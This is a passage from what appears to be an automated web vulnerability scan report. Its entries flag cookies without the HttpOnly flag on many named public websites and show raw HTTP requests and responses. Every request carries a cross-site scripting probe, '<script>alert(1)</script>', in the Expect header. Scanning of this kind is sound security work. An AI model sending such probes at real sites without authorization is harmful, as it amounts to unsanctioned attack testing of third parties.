The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bike.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CUR PSAi IVAi CONi OUR OTRo UNRo IND UNI PHYi ONL PUR FIN NAV"
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=A98E9A3C452DB98012B0FFBC73DECC41; Path=/; Domain=.bike.com
Set-Cookie: TLTUID=A98E9A3C452DB98012B0FFBC73DECC41; Path=/; Domain=.bike.com; expires=Wed, 04-05-2021 00:55:37 GMT
Date: Wed, 04 May 2011 00:55:36 GMT
Set-Cookie: NSC_Qfut-wjqt=e240663b3660;path=/


15.113. http://www.bluecrossma.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluecrossma.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bluecrossma.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: "Web Server"
Date: Wed, 04 May 2011 01:41:57 GMT
Content-type: image/x-icon
Last-modified: Tue, 20 Feb 2007 20:10:16 GMT
Content-length: 894
Etag: "37e-45db55a8"
Accept-ranges: bytes
Set-Cookie: NSC_MCW-Cmvfdspttnb.dpn=4481ff3a29a1;Version=1;path=/

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

15.114. http://www.bystolic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bystolic.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bystolic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:23:16 GMT
Set-Cookie: NSC_cztupmjd-wjq=8efb302d3660;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.115. http://www.calltrackingportal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.calltrackingportal.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.calltrackingportal.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 04:16:17 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 481
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServercalltrackingportal.com_HTTP=2644981455.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.116. http://www.cartoonnetworkasia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cartoonnetworkasia.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cartoonnetworkasia.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=YUPQMPSPASSPORTWEB3140CKWII; path=/
Date: Wed, 04 May 2011 02:44:08 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 481
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.117. http://www.cbburnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbburnet.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cbburnet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: cbburnet.com=R952864175; path=/; expires=Wed, 04-May-2011 06:54:28 GMT
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:39:56 GMT


15.118. http://www.celebsquares.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebsquares.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.celebsquares.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 01:06:38 GMT
Content-Length: 60
Set-Cookie: BIGipServerpool-74.205.17.3=2030151872.0.0000; path=/

The page cannot be displayed because the expectation failed.

15.119. http://www.chaoticgame.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chaoticgame.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chaoticgame.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:48:19 GMT
Content-Length: 60
Set-Cookie: BIGipServerwww2.chaoticgame.com_pool=2738080010.20480.0000; path=/

The page cannot be displayed because the expectation failed.

15.120. http://www.chaparral-racing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chaparral-racing.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chaparral-racing.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:30:56 GMT
Content-Length: 60
Set-Cookie: BNI__Chap_HTTP=1002120a00005000; Path=/; Max-age=3600

The page cannot be displayed because the expectation failed.

15.121. http://www.chop.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chop.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chop.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:56:17 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_Dipq_Joufsofu*80=ffffffff09c9053845525d5f4f58455e445a4a423660;expires=Wed, 04-May-2011 01:58:17 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.122. http://www.cmphotocenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmphotocenter.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cmphotocenter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 04:00:54 GMT
Server: Apache/2.2.15 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8m mod_jk/1.2.30
Content-Length: 519
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerwww.cmphotocenter.com-80=574365194.20480.0000; expires=Wed, 04-May-2011 04:25:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.123. http://www.codigobarras.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codigobarras.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.codigobarras.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: TRACKID=1f8a19505783dfe73d23ef420642e575; Path=/; Version=1
Set-Cookie: TRACKID=eb5f077510ac319d61c63b71b507cdc5; Path=/; Version=1
X-Powered-By: PHP/5.2.6
Content-type: text/html
Date: Wed, 04 May 2011 02:10:24 GMT
Server: lighttpd/1.4.26-devel-109890:109892M
Content-Length: 346

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

15.124. http://www.coldwellbankermoves.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coldwellbankermoves.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coldwellbankermoves.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: coldwellBankermoves.com=R720219030; path=/; expires=Wed, 04-May-2011 05:31:05 GMT
Cache-Control: private
Content-Length: 0
Location: http://www.coldwellbankermoves.com/error.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:18:01 GMT


15.125. http://www.commtrans.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.commtrans.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.commtrans.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 02:02:52 GMT
Content-Length: 60
Set-Cookie: Coyote-2-c0a86363=c0a8630c:0; path=/

The page cannot be displayed because the expectation failed.

15.126. http://www.consumerexpressions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consumerexpressions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.consumerexpressions.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=VVJJXKScfweb15CKMJQ; path=/
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
a4: CE
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:55:48 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.127. http://www.cowboom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cowboom.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cowboom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Set-Cookie: acecookie=R1194250388; path=/
Connection: close
Date: Wed, 04 May 2011 01:05:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
EXPIRES: -1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 04 May 2011 01:05:53 GMT
Set-Cookie: acecookie=R3379086043; path=/
Set-Cookie: CFID=50798381; path=/; domain=.cowboom.com; HttpOnly
Set-Cookie: CFTOKEN=f0fdb3d7e478f510-B88A2A0D-ADAA-4D4F-DF477DF4655C3232; path=/; domain=.cowboom.com; HttpOnly


                                                       <html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--[if lt IE 7]>
<style type="text/css" media="sc
...[SNIP]...

15.128. http://www.creditacceptance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditacceptance.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.creditacceptance.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:21 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1606
Set-Cookie: BIGipServerwwwCApool80=358900746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...

15.129. http://www.creditimprovers.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditimprovers.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.creditimprovers.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:28:50 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-c0a88791=a0c0023:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.130. http://www.crohnsonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crohnsonline.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crohnsonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie:WT_INTOUCH=173.193.214.243-1416099408.30149127; expires=Mon, 02-May-2016 02:59:48 GMT; path=/
Date: Wed, 04 May 2011 02:59:48 GMT
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.131. http://www.cslplasma.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cslplasma.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cslplasma.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: CSLWTCOOKIE=173.193.214.243-1304474103.404; expires=Thu, 03-May-2012 01:55:03 GMT; path=/;
Set-Cookie: X-Mapping-fdgilpeb=4515722B61EC1EA7E566DCBD3B626A3C; path=/
Content-Length: 3019
Date: Wed, 04 May 2011 01:55:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" c
...[SNIP]...

15.132. http://www.customclassictrucks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customclassictrucks.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.customclassictrucks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1ekyz445diidt245sqag3x45; path=/; HttpOnly
Set-Cookie: UserPuid=2334369075916018239; domain=customclassictrucks.com; expires=Wed, 04-May-2061 00:44:39 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... .........................JMQ.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.JMQ.8<A.-16.-16.-16.-16.-16.-16.-16.-16.-16.-16.-16.-16.-16.-16.8<A.<@D.-16.-1
...[SNIP]...

15.133. http://www.datamark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.datamark.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.datamark.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 21:56:29 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 470
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerWebFarm=1107427850.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.134. http://www.daykick.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.daykick.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.daykick.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.daykick.com/daykick/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fmyckx34xt5eizbe4ee3w355; path=/; HttpOnly
Set-Cookie: PSGUID=0af26958-1f4e-4ab8-a5c7-fabb453937ff; expires=Fri, 03-Jun-2011 01:07:32 GMT; path=/
X-AspNet-Version: 2.0.50727
Server-Name: MIS-WEB90A
P3P: CP="CAO PSA OUR"
Date: Wed, 04 May 2011 01:07:31 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-1=1208105994.20480.0000; path=/


15.135. http://www.diamond.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diamond.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diamond.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 03 May 2011 17:39:13 GMT
Content-Type: image/x-icon
Connection: keep-alive
Content-Length: 1406
Last-Modified: Sat, 11 Dec 2010 16:12:15 GMT
Accept-Ranges: bytes
ETag: "30eb272d4e99cb1:1f19"
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=9DB355437EA0212B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.diamond.com

..............h.......(....... ...............................}k|.........cQc.....................iXh.....XDW.........lZk.........................o\n.`M_..............p..................hVg...........
...[SNIP]...

15.136. http://www.dinnerplates.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dinnerplates.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dinnerplates.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
P3P: CP="IDC DSP COR ADM CUR DEV TAI PSA CON OUR IND COM DEM PRE STA"
Date: Wed, 04 May 2011 03:02:12 GMT
Set-Cookie: ServerCache=2132024074.20480.0000; path=/
Server_Id: BO3.20.127


15.137. http://www.edfinancial.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.edfinancial.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.edfinancial.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:48:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CMSPreferredCulture=en-US; expires=Fri, 04-May-2012 03:48:18 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4wttfs554wigrz45umkveozy; path=/; HttpOnly
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 4837


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Page not f
...[SNIP]...

15.138. http://www.efolks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.efolks.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.efolks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:18:49 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-c0a88793=a0c001b:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.139. http://www.embroiderydesigns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.embroiderydesigns.com
Path:   /favicon.ico

Issue detail

